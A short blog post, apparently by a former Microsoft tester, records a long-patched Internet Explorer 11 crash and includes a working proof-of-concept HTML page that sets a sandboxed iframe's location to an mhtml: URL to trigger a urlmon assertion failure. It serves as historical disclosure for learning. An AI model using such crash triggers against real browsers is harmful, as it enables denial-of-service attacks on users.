DoS: Loading MHTML Protocol URL in an iFrame

A brief crash report. Setting an iFrame’s location to a mhtml: URL — including a bare mhtml: with no path — triggered an assertion failure in urlmon!CBSCHolder::RemoveNode, the same root cause as the top-level MHTML navigation crash.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_Load_mhtml_in_iFrame</title>
</head>
<body>
<iframe sandbox width="50" height="20"></iframe>
<script>
function crash1()
{
	window[0].location = "mhtml:" + location.href;
}
function crash2()
{
	window[0].location = "mhtml:";
	setTimeout('window[0].location = "mhtml:";', 500);
}
</script>
</body>
</html>

Both variants hit the same urlmon!CBSCHolder::RemoveNode assertion at mpxbsc.cxx(1685) with unknown exploitability. The mhtml: protocol handler consistently left a bind status callback in a state where it could not be revoked during navigation teardown, whether triggered from the top-level frame or an iFrame.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: modelessDialog Redirect with Simultaneous Alert] :: [DoS: Accessing Destroyed Intl Object After iFrame Navigation] >